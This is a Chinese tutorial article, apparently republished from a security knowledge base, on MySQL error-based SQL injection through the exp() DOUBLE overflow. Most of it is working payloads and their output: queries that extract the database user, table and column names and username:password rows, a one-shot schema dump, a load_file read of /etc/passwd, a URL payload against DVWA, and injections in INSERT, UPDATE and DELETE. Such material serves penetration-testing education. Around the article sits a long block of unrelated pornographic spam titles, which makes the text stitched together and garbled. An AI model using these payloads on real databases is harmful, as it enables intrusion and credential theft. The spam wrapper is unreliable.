精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

使用exp進行SQL報錯注入

安全 數據安全
好消息好消息~作者又在MySQL中發現了一個Double型數據溢出。

0x01 前言概述

好消息好消息~作者又在MySQL中發現了一個Double型數據溢出。如果你想了解利用溢出來注出數據,你可以讀一下作者之前發的博文:BIGINT Overflow Error based injections,drops上面也有對應翻譯,具體見這里。當我們拿到MySQL里的函數時,作者比較感興趣的是其中的數學函數,它們也應該包含一些數據類型來保存數值。所以作者就跑去測試看哪些函數會出現溢出錯誤。然后作者發現,當傳遞一個大于709的值時,函數exp()就會引起一個溢出錯誤。

使用exp進行SQL報錯注入

mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

在MySQL中,exp與ln和log的功能相反,簡單介紹下,就是log和ln都返回以e為底數的對數,見等式:

 

 

enter image description here

 

 

 

enter image description here

mysql> select log(15);
+------------------+
| log(15)          |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)


mysql> select ln(15);
+------------------+
| ln(15)           |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)

 

指數函數為對數函數的反函數,exp()即為以e為底的對數函數,如等式:

 

enter image description here

mysql> select exp(2.70805020110221);
+-----------------------+
| exp(2.70805020110221) |
+-----------------------+
|                    15 |
+-----------------------+
1 row in set (0.00 sec)

 

0x02 注入

當涉及到注入時,我們使用否定查詢來造成“DOUBLE value is out of range”的錯誤。作者之前的博文提到的,將0按位取反就會返回“18446744073709551615”,再加上函數成功執行后返回0的緣故,我們將成功執行的函數取反就會得到***的無符號BIGINT值。

mysql> select ~0;
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)


mysql> select ~(select version());
+----------------------+
| ~(select version())  |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)

我們通過子查詢與按位求反,造成一個DOUBLE overflow error,并借由此注出數據。

  1. >`exp(~(select*from(select user())x))`  
  2.  
  3.     mysql> select exp(~(select*from(select user())x));  
  4.     ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))' 

0x03 注出數據

得到表名:

 

  1. select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x)); 

 

得到列名:

 

  1. select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x)); 

 

檢索數據:

 

  1. select exp(~ (select*from(select concat_ws(':',id, username, passwordfrom users limit 0,1)x)); 

 

0x04 一蹴而就

這個查詢可以從當前的上下文中dump出所有的tables與columns。我們也可以dump出所有的數據庫,但由于我們是通過一個錯誤進行提取,它會返回很少的結果。

  1. exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))  
  2.  
  3. http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit# 

 

enter image description here

 

0x05 讀取文件

你可以通過load_file()函數來讀取文件,但作者發現有13行的限制,該語句也可以在BIGINT overflow injections中使用。

  1. select exp(~(select*from(select load_file('/etc/passwd'))a));  
  2.  

 

enter image description here

 

注意,你無法寫文件,因為這個錯入寫入的只是0。

  1. mysql> select exp(~(select*from(select 'hello')a)) into outfile 'C:/out.txt';  
  2. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'hello' from dual)))'      
  3.  
  4. # type C:\out.txt  

0x06 Injection in Insert

按部就班就好

  1. mysql> insert into users (id, username, passwordvalues (2, '' ^ exp(~(select*from(select user())x)), 'Eyre');  
  2. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))' 

對于所有的insert,update和delete語句DIOS查詢也同樣可以使用。

  1. mysql> insert into users (id, username, passwordvalues (2, '' | exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)), 'Eyre');  
  2. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '000  
  3. newdb::users::id  
  4. newdb::users::username  
  5. newdb::users::password' from dual)))' 

0x07 Injection in Update

  1. mysql> update users set password='Peter' ^ exp(~(select*from(select user())x)) where id=4;  
  2. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))' 

0x08 Injection in Delete

  1. mysql> delete from users where id='1' | exp(~(select*from(select user())x));  
  2. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))' 

和前面的BIGINT注入一樣,exp注入也適用于MySQL5.5.5及以上版本。以前的版本對于此情況則是“一言不發”。

  1. mysql> select version();  
  2. +---------------------+  
  3. | version()           |  
  4. +---------------------+  
  5. | 5.0.45-community-nt |  
  6. +---------------------+  
  7. 1 row in set (0.00 sec)   
  8.  
  9.  
  10. mysql> select exp(710);  
  11. +----------+  
  12. | exp(710) |  
  13. +----------+  
  14. |   1.#INF |  
  15. +----------+  
  16. 1 row in set (0.00 sec)   
  17.  
  18.  
  19. mysql> select exp(~0);  
  20. +---------+  
  21. | exp(~0) |  
  22. +---------+  
  23. |  1.#INF |  
  24. +---------+  
  25. 1 row in set (0.00 sec) 

可能還有其他的函數會產生這種報錯呦。(有待你發現啦:)

責任編輯:藍雨淚 來源: 烏云知識庫
相關推薦

2010-12-14 11:30:11

2010-03-29 16:16:59

Oracle exp備

2010-12-20 16:04:30

2009-03-10 08:05:19

2013-11-07 09:31:22

2024-05-06 13:34:28

WireGoogleGo

2017-08-10 10:23:59

2021-05-09 22:48:40

SQL數據庫變量

2024-08-19 08:16:57

@Resource@AutowiredSpring

2010-04-13 14:35:17

2009-09-27 09:39:19

2019-07-05 08:12:36

SQLMAPsql注入

2013-05-02 15:09:22

2020-10-26 07:04:29

SQL注入mysql

2023-07-13 11:24:14

SQL優化賦值

2021-08-09 15:00:36

SQL數據庫

2010-09-17 13:40:43

SQL更新

2019-10-17 09:25:56

Spark StreaPVUV

2009-04-16 17:44:46

性能優化擴展高性能

2023-10-18 18:31:04

SQL查詢數據
點贊
收藏

51CTO技術棧公眾號

亚洲成人激情小说| 欧美视频观看一区| 国产一级特黄a高潮片| 欧美日韩一本| 欧美日韩一区二区三区免费看| 精品久久免费观看| 五月婷婷六月激情| 久久国产婷婷国产香蕉| 国内精品国产三级国产在线专| 黄色在线观看av| 精品中文字幕一区二区三区四区 | 久热国产精品| 日韩视频免费在线观看| 人妻av一区二区| 国产亚洲人成a在线v网站| 亚洲图片欧美色图| 亚洲乱码一区二区三区 | 色综合久久久| 欧美性xxxx在线播放| 久久天天东北熟女毛茸茸| 精品资源在线看| 成年人网站91| 欧美自拍偷拍一区| 熟女视频一区二区三区| 午夜小视频免费| 国产精品影视在线观看| 国产精品久久久久久久久| 久久综合久久鬼| 天天做天天爱天天综合网| 亚洲片在线资源| 国产人妻黑人一区二区三区| 电影一区中文字幕| 欧美日韩精品专区| 中文字幕无码不卡免费视频| 1234区中文字幕在线观看| 亚洲欧洲日韩女同| 亚洲一区二区在线看| 麻豆导航在线观看| av亚洲精华国产精华精| 99国产在线| 国产av一区二区三区精品| 日本女优在线视频一区二区| 啪一啪鲁一鲁2019在线视频| 国产在线一二区| 欧美视频四区| 欧美激情在线一区| 青青草原免费观看| 欧美日韩1区2区3区| 久久艳片www.17c.com| 日本女人性生活视频| 波多野结衣加勒比| 在线播放国产一区中文字幕剧情欧美| 日韩精品免费| 日本xxxxxwwwww| 亚洲小视频网站| 国产精品久久久久7777婷婷| 亚洲国产精品久久人人爱蜜臀| 久久久久免费| 亚洲1卡2卡3卡4卡乱码精品| 国产三区视频在线观看| 国产精品亚洲一区二区三区妖精| 国产精品高精视频免费| 在线观看 亚洲| 免费日韩av片| 国产精品美女免费看| 青青国产在线视频| 免费av网站大全久久| 国产欧美在线视频| 国产区精品在线| 国产成人在线看| 国产亚洲一区在线播放| 五月婷婷久久久| 国产日韩精品一区二区三区 | 色愁久久久久久| 亚洲男人天堂2023| 成人无码精品1区2区3区免费看 | 高清精品xnxxcom| 亚洲精品影视在线观看| av黄色在线免费观看| 日韩大片在线| 久久久久久网站| 国产性猛交╳xxx乱大交| 巨乳诱惑日韩免费av| 国产精品一区久久久| 午夜精品小视频| 91色九色蝌蚪| 亚洲国产欧美日韩| 青青草视频在线免费直播| 欧美色图在线视频| 中文字幕亚洲影院| 久久香蕉网站| 日韩在线激情视频| 国产一卡二卡在线| 日本美女视频一区二区| av一区二区三区四区电影| 久久久久久久久亚洲精品| 中文字幕在线一区| 丁香六月激情婷婷| 青青久久精品| 亚洲精品久久久久久下一站| 特级西西www444人体聚色| 午夜欧美精品| 国产精品午夜国产小视频| 亚洲国产精品suv| 国产清纯在线一区二区www| 国产a级黄色大片| 国产精品99| 日韩www在线| 在线免费观看亚洲视频| 日韩在线观看一区二区| 国产伦精品一区二区三区照片 | 久久av色综合| 欧美另类tv| 国产精品传媒在线| www.成年人视频| 欧美激情啪啪| 亚洲摸下面视频| 久久精品www| 久色婷婷小香蕉久久| 蜜桃av噜噜一区二区三区| 天堂av资源在线观看| 欧美三级乱人伦电影| 久久一区二区电影| 国产综合网站| 亚洲综合日韩在线| 视频免费一区| 精品婷婷伊人一区三区三| 美女久久久久久久久久| 亚洲每日在线| 国产精成人品localhost| caoporn97在线视频| 婷婷中文字幕一区三区| 国产欧美日韩精品一区| 国产高清成人在线| 日本午夜精品理论片a级appf发布| 国产黄色小视频在线观看| 精品国产精品国产偷麻豆| 中日韩午夜理伦电影免费| 国产精品白浆一区二小说| 国产精品99久久久久久久女警 | 国产一区二区三区四区大秀| 97香蕉超级碰碰久久免费软件 | 日韩黄色片网站| 久久尤物电影视频在线观看| 国产va亚洲va在线va| 天堂精品在线视频| 久久91亚洲精品中文字幕| 国产视频www| 亚洲精品欧美激情| 亚洲熟女乱综合一区二区| 欧美人成在线| 国产乱码精品一区二区三区不卡| 欧美激情成人动漫| 精品成人a区在线观看| 91精品国产高潮对白| 不卡一区二区三区四区| 91国视频在线| 欧美女王vk| 成人国内精品久久久久一区| 超碰在线最新| 日韩免费高清av| 国产特黄大片aaaa毛片| 久久亚洲综合av| 爱情岛论坛亚洲首页入口章节| 日韩电影免费在线观看| 成人a在线视频| 第一av在线| 亚洲美女在线看| 中文人妻熟女乱又乱精品| 亚洲欧美日韩成人高清在线一区| 黄页网站在线看| 国产亚洲在线| 一区二区三区四区五区视频| 精品久久国产一区| 97在线看福利| 国产黄色片在线播放| 欧美一个色资源| 午夜毛片在线观看| 欧美激情资源网| 又大又长粗又爽又黄少妇视频| 亚洲精选国产| 亚洲国产欧美不卡在线观看| 18国产精品| 国产成人av在线| 在线中文字幕视频观看| 日韩精品在线观看一区| 一级片在线观看视频| 亚洲国产综合在线| 国产又粗又硬视频| 成人午夜短视频| 国产精品拍拍拍| 欧美日韩岛国| 一区二区免费在线观看| 精品按摩偷拍| 成人免费视频在线观看超级碰| a在线视频v视频| 日日噜噜噜夜夜爽亚洲精品| 人妻无码一区二区三区久久99| 欧美三级蜜桃2在线观看| 伊人国产在线观看| 国产精品理论片在线观看| 亚洲一区二区三区四区五区六区 | 91精品免费久久久久久久久| 美女在线视频免费| 九九九久久国产免费| 国产youjizz在线| 亚洲精品二三区| 国产免费av观看| 在线亚洲一区观看| 免费看日韩毛片| 亚洲精品久久久久久国产精华液| 国产精品天天干| 99久久精品久久久久久清纯| aaaaaaaa毛片| 美女一区二区三区| 亚洲人成色77777| 一区三区视频| 法国空姐在线观看免费| 菠萝蜜一区二区| 欧美日韩一区二区三| 国产精品99久久免费观看| 18成人在线| 热久久久久久| 国产精品日韩一区| 日韩网站中文字幕| 欧美中文字幕在线播放| 国产高清视频色在线www| 欧美风情在线观看| 91在线中文| www.久久久久久.com| av二区在线| 国产一区二区激情| 国产永久av在线| 亚洲热线99精品视频| 天天摸天天干天天操| 精品免费一区二区三区| 国产刺激高潮av| 精品免费99久久| 日韩一卡二卡在线| 欧美精品一区二区三区高清aⅴ | 国精产品一区一区三区有限在线| av大大超碰在线| 欧美老女人性生活| 国产在线激情| 麻豆乱码国产一区二区三区| 乱人伦中文视频在线| 日韩在线观看成人| av在线免费网址| 欧美成人精品一区二区| 成人av福利| 欧美高清激情视频| 欧美性video| 久久久最新网址| 一个人www视频在线免费观看| 66m—66摸成人免费视频| 在线黄色的网站| 国产成人aa精品一区在线播放| 97欧美成人| 亚洲一区二区三区视频| 99久久人爽人人添人人澡 | 国产盗摄xxxx视频xxx69| 天然素人一区二区视频| 成人性生交xxxxx网站| 综合久久成人| 欧美激情www| 日韩精品一区二区三区免费观看| 一区二区免费电影| 欧美日韩一区自拍| 岳毛多又紧做起爽| 免费的成人av| 91丨porny丨九色| jiyouzz国产精品久久| 波多野结衣片子| 亚洲人妖av一区二区| av资源吧首页| 欧美影视一区在线| 99热这里只有精| 日韩精品中文在线观看| 午夜免费福利在线观看| 欧美黑人性生活视频| 亚洲综合在线电影| 5g国产欧美日韩视频| 日韩美女精品| 中文视频一区视频二区视频三区 | 日韩免费高清在线| 激情av综合网| 自拍视频一区二区| 亚洲欧洲99久久| 啦啦啦免费高清视频在线观看| 欧美精品第一页| 午夜视频在线免费播放| 色妞色视频一区二区三区四区| brazzers在线观看| 国产日韩欧美综合| 精品女人视频| 中文字幕av日韩精品| 亚洲深夜av| av影片在线播放| 欧美国产精品中文字幕| 国产午夜视频在线| 7799精品视频| 国产中文字幕在线播放| 午夜精品久久久久久久99黑人| 青青久久精品| 日本一区二区高清视频| 极品日韩av| www.久久com| 国产精品理论在线观看| 99精品人妻国产毛片| 重囗味另类老妇506070| 亚洲h精品动漫在线观看| 国产精品美女免费视频| 中文一区一区三区高中清不卡免费| 成人黄色av播放免费| 国产精品三级| 亚洲中文字幕无码专区| 国产成人综合视频| 亚洲a∨无码无在线观看| 蜜臀久久99精品久久久画质超高清| 日韩在线国产| 国产亚洲精品v| 性欧美18—19sex性高清| 亚洲欧美日韩中文播放| 国产一区在线观| 中文字幕另类日韩欧美亚洲嫩草| 久久一区视频| 少妇精品无码一区二区| 中文字幕综合网| 中文在线免费观看| 亚洲无亚洲人成网站77777| 人成在线免费网站| 国产欧美日韩综合精品二区| 欧美国产激情| 午夜诱惑痒痒网| 亚洲天堂2016| 中文字幕国产免费| 国产999精品久久久久久绿帽| 久久嫩草捆绑紧缚| 欧美日韩dvd在线观看| 国产人成在线观看| 日韩免费在线看| 久久综合影院| 亚洲男人天堂色| 日本一区二区高清| 这里只有精品国产| 中文字幕免费国产精品| 成人不卡视频| 影音先锋在线亚洲| 黑人巨大精品欧美黑白配亚洲| 国内精品久久久久久久果冻传媒| 久久av中文| 三级a在线观看| 中文字幕中文字幕一区二区| 国产欧美一级片| 久久久久国产精品www| 蜜桃久久久久| 亚洲精品乱码久久久久久自慰 | 欧美 日本 国产| 欧美视频第一页| av片在线免费观看| 亚洲直播在线一区| 激情亚洲成人| 一区二区黄色片| 欧美日韩中文另类| 污的网站在线观看| 久久精品99久久| 美日韩一区二区三区| 放荡的美妇在线播放| 亚洲国产精品yw在线观看| 一呦二呦三呦精品国产| 三年中文高清在线观看第6集| 国产精品99久久久久久久女警| 中文字幕日韩一级| 在线视频精品一| 日韩成人视屏| 黄色片一级视频| 国产精品高潮呻吟| 韩国av在线免费观看| 日本欧美精品在线| 亚洲一区在线| 中文字幕狠狠干| 91.麻豆视频| 两个人看的在线视频www| 日韩国产欧美精品| 国产成人精品一区二区三区四区| 中文字幕激情小说| 久久久精品国产| 亚洲免费成人av在线| xxxx在线免费观看| 精品国产成人在线| 国产在线激情| 欧美一区二区三区在线免费观看 | 老牛影视免费一区二区| 蜜桃av一区二区在线观看| 国产在线观看成人| 日韩专区中文字幕| 久久av影视| 理论片大全免费理伦片| 欧美精品色综合| 高清av不卡|